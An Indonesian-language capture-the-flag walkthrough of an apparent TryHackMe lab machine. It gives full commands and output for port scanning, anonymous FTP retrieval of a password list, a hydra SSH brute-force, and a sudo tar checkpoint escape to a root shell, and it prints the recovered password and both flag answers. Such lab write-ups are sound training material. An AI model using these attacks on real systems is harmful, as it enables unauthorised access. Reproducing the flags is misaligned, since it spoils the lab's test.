Anda berbicara tentang permainan besar tentang menjadi peretas paling elit di tata surya. Buktikan dan klaim hak Anda atas status Elite Bounty Hacker!
Anda terus-menerus membual tentang keterampilan peretas elit Anda di bar dan beberapa Pemburu Bayaran memutuskan mereka akan menuntut Anda! Buktikan status Anda lebih dari sekadar beberapa gelas di bar. Saya merasakan paprika & daging sapi di masa depan Anda!
Terapkan mesin.
Temukan port terbuka di mesin
Lakukan scanning terhadap port.
┌─[cyber@cyber]─[~]
└──╼ $sudo nmap -sC -sV -A -vv 10.10.237.251
[sudo] password for cyber:
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-02 02:31 WIT
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 02:31
Completed NSE at 02:31, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 02:31
Completed NSE at 02:31, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 02:31
Completed NSE at 02:31, 0.00s elapsed
Initiating Ping Scan at 02:31
Scanning 10.10.237.251 [4 ports]
Completed Ping Scan at 02:31, 0.90s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 02:31
Completed Parallel DNS resolution of 1 host. at 02:31, 13.00s elapsed
Initiating SYN Stealth Scan at 02:31
Scanning 10.10.237.251 [1000 ports]
Discovered open port 80/tcp on 10.10.237.251
Discovered open port 21/tcp on 10.10.237.251
Discovered open port 22/tcp on 10.10.237.251
Completed SYN Stealth Scan at 02:32, 49.72s elapsed (1000 total ports)
Initiating Service scan at 02:32
Scanning 3 services on 10.10.237.251
Completed Service scan at 02:32, 7.66s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against 10.10.237.251
Retrying OS detection (try #2) against 10.10.237.251
Initiating Traceroute at 02:32
Completed Traceroute at 02:32, 0.76s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 02:32
Completed Parallel DNS resolution of 2 hosts. at 02:33, 13.00s elapsed
NSE: Script scanning 10.10.237.251.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 02:33
NSE: [ftp-bounce 10.10.237.251:21] PORT response: 500 Illegal PORT command.
Completed NSE at 02:33, 18.72s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 02:33
Completed NSE at 02:33, 4.37s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 02:33
Completed NSE at 02:33, 0.00s elapsed
Nmap scan report for 10.10.237.251
Host is up, received echo-reply ttl 63 (0.72s latency).
Scanned at 2021-03-02 02:31:31 WIT for 118s
Not shown: 967 filtered ports
Reason: 967 no-responses
PORT STATE SERVICE REASON VERSION
20/tcp closed ftp-data reset ttl 63
21/tcp open ftp syn-ack ttl 63 vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-rw-r-- 1 ftp ftp 418 Jun 07 2020 locks.txt
|_-rw-rw-r-- 1 ftp ftp 68 Jun 07 2020 task.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.9.169.148
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 dc:f8:df:a7:a6:00:6d:18:b0:70:2b:a5:aa:a6:14:3e (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCgcwCtWTBLYfcPeyDkCNmq6mXb/qZExzWud7PuaWL38rUCUpDu6kvqKMLQRHX4H3vmnPE/YMkQIvmz4KUX4H/aXdw0sX5n9jrennTzkKb/zvqWNlT6zvJBWDDwjv5g9d34cMkE9fUlnn2gbczsmaK6Zo337F40ez1iwU0B39e5XOqhC37vJuqfej6c/C4o5FcYgRqktS/kdcbcm7FJ+fHH9xmUkiGIpvcJu+E4ZMtMQm4bFMTJ58bexLszN0rUn17d2K4+lHsITPVnIxdn9hSc3UomDrWWg+hWknWDcGpzXrQjCajO395PlZ0SBNDdN+B14E0m6lRY9GlyCD9hvwwB
| 256 ec:c0:f2:d9:1e:6f:48:7d:38:9a:e3:bb:08:c4:0c:c9 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMCu8L8U5da2RnlmmnGLtYtOy0Km3tMKLqm4dDG+CraYh7kgzgSVNdAjCOSfh3lIq9zdwajW+1q9kbbICVb07ZQ=
| 256 a4:1a:15:a5:d4:b1:cf:8f:16:50:3a:7d:d0:d8:13:c2 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICqmJn+c7Fx6s0k8SCxAJAoJB7pS/RRtWjkaeDftreFw
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: POST OPTIONS GET HEAD
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Siapa yang menulis daftar tugas?
tahap ini, mengajarkan kita sedikit berfikir untuk mendapatkan siapa yang menulis file locks.txt dan task.txt. Selanjutnya kita login dengan FTP, jalankan perintah berikut:
┌─[cyber@cyber]─[~/Downloads] └──╼ $ftp o (to) 10.10.237.251 Connected to 10.10.237.251. 220 (vsFTPd 3.0.3) Name (10.10.237.251:cyber): Anonymous 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ls 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. -rw-rw-r-- 1 ftp ftp 418 Jun 07 2020 locks.txt -rw-rw-r-- 1 ftp ftp 68 Jun 07 2020 task.txt 226 Directory send OK.
jalankan perintah help untuk melihat yang akan di gunakan.
ftp> help
Commands may be abbreviated. Commands are:
! dir mdelete qc site
$ disconnect mdir sendport size
account exit mget put status
append form mkdir pwd struct
ascii get mls quit system
bell glob mode quote sunique
binary hash modtime recv tenex
bye help mput reget tick
case idle newer rstatus trace
cd image nmap rhelp type
cdup ipany nlist rename user
chmod ipv4 ntrans reset umask
close ipv6 open restart verbose
cr lcd prompt rmdir ?
delete ls passive runique
debug macdef proxy send
ftp> pwd
257 "/" is the current directory
ftp>
Karna berdasarkan list command di atas tidak ada 'cat' untuk membaca fial ke dua file tersebut. Selanjutnya kita akan mentransfer ke dua file tersebu ke komputer kita dengan jalankan perintah berikut:
ftp> get locks.txt local: locks.txt remote: locks.txt 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for locks.txt (418 bytes). 226 Transfer complete. 418 bytes received in 0.09 secs (4.5146 kB/s) ftp> get task.txt local: task.txt remote: task.txt 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for task.txt (68 bytes). 226 Transfer complete. 68 bytes received in 0.00 secs (510.8173 kB/s) ftp>
Buka terminal baru dan liat file-nya. pastikan tidak berada di FTP yang baru kita login. lihat pada direktori komputer yang di gunakan lalu cat file-nya.
┌─[cyber@cyber]─[~/Downloads/FTP]
└──╼ $ls
locks.txt task.txt
┌─[cyber@cyber]─[~/Downloads/FTP]
└──╼ $cat locks.txt
rEddrAGON
ReDdr4g0nSynd!cat3
Dr@gOn$yn9icat3
R3DDr46ONSYndIC@Te
ReddRA60N
R3dDrag0nSynd1c4te
dRa6oN5YNDiCATE
ReDDR4g0n5ynDIc4te
R3Dr4gOn2044
RedDr4gonSynd1cat3
R3dDRaG0Nsynd1c@T3
Synd1c4teDr@g0n
reddRAg0N
REddRaG0N5yNdIc47e
Dra6oN$yndIC@t3
4L1mi6H71StHeB357
rEDdragOn$ynd1c473
DrAgoN5ynD1cATE
ReDdrag0n$ynd1cate
Dr@gOn$yND1C4Te
RedDr@gonSyn9ic47e
REd$yNdIc47e
dr@goN5YNd1c@73
rEDdrAGOnSyNDiCat3
r3ddr@g0N
ReDSynd1ca7e
┌─[cyber@cyber]─[~/Downloads/FTP]
└──╼ $cat task.txt
1.) Protect Vicious.
2.) Plan for Red Eye pickup on the moon.
-lin
Asnware = lin
Layanan apa yang dapat Anda lakukan bruteforce dengan file teks yang ditemukan?
Lakuakan brut force menggunakan hydra pada port ssh dan gunakan file lock.txt. Jalankan perintah berikut:
┌─[cyber@cyber]─[~]
└──╼ $hydra -l lin -P Downloads/FTP/locks.txt 10.10.237.251 -t 4 ssh
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-03-02 04:10:49
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 4 tasks per 1 server, overall 4 tasks, 26 login tries (l:1/p:26), ~7 tries per task
[DATA] attacking ssh://10.10.237.251:22/
[22][ssh] host: 10.10.237.251 login: lin password: RedDr4gonSynd1cat3
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-03-02 04:11:14
Answare = RedDr4gonSynd1cat3
user.txt
Selanjutnya login dengan ssh menggunakan user dan password yang telah di dapat.
┌─[cyber@cyber]─[~]
└──╼ $ssh lin@10.10.237.251 -p 22
The authenticity of host '10.10.237.251 (10.10.237.251)' can't be established.
ECDSA key fingerprint is SHA256:fzjl1gnXyEZI9px29GF/tJr+u8o9i88XXfjggSbAgbE.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.237.251' (ECDSA) to the list of known hosts.
[email protected]'s password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.15.0-101-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
83 packages can be updated.
0 updates are security updates.
Last login: Sun Jun 7 22:23:41 2020 from 192.168.0.14
lin@bountyhacker:~/Desktop$ ls
user.txt
lin@bountyhacker:~/Desktop$ cat user.txt
THM{CR1M3_SyNd1C4T3}
lin@bountyhacker:~/Desktop$
Answer = THM{CR1M3_SyNd1C4T3}
root.txt
Sekarang kita mencari flag root.txt, karena memiliki termission. untuk catatan baca juga artikel GTFOBins
jalankan perintah berikut:
lin@bountyhacker:~$ sudo -h
sudo - execute a command as another user
usage: sudo -h | -K | -k | -V
usage: sudo -v [-AknS] [-g group] [-h host] [-p prompt] [-u user]
usage: sudo -l [-AknS] [-g group] [-h host] [-p prompt] [-U user] [-u user] [command]
usage: sudo [-AbEHknPS] [-r role] [-t type] [-C num] [-g group] [-h host] [-p prompt] [-u user] [VAR=value] [-i|-s] [<command>]
usage: sudo -e [-AknS] [-r role] [-t type] [-C num] [-g group] [-h host] [-p prompt] [-u user] file ...
Options:
-A, --askpass use a helper program for password prompting
-b, --background run command in the background
-C, --close-from=num close all file descriptors >= num
-E, --preserve-env preserve user environment when running command
-e, --edit edit files instead of running a command
-g, --group=group run command as the specified group name or ID
-H, --set-home set HOME variable to target user's home dir
-h, --help display help message and exit
-h, --host=host run command on host (if supported by plugin)
-i, --login run login shell as the target user; a command may also be specified
-K, --remove-timestamp remove timestamp file completely
-k, --reset-timestamp invalidate timestamp file
-l, --list list user's privileges or check a specific command; use twice for longer format
-n, --non-interactive non-interactive mode, no prompts are used
-P, --preserve-groups preserve group vector instead of setting to target's
-p, --prompt=prompt use the specified password prompt
-r, --role=role create SELinux security context with specified role
-S, --stdin read password from standard input
-s, --shell run shell as the target user; a command may also be specified
-t, --type=type create SELinux security context with specified type
-U, --other-user=user in list mode, display privileges for user
-u, --user=user run command (or edit file) as specified user name or ID
-V, --version display version information and exit
-v, --validate update user's timestamp without running a command
-- stop processing command line arguments
lin@bountyhacker:~$ sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
tar: Removing leading `/' from member names
# id
uid=0(root) gid=0(root) groups=0(root)
# ls
Desktop Documents Downloads Music Pictures Public Templates Videos
# cd /root
# ls
root.txt
# cat root.txt
THM{80UN7Y_h4cK3r}
Answre = THM{80UN7Y_h4cK3r}
okey,,,, finish..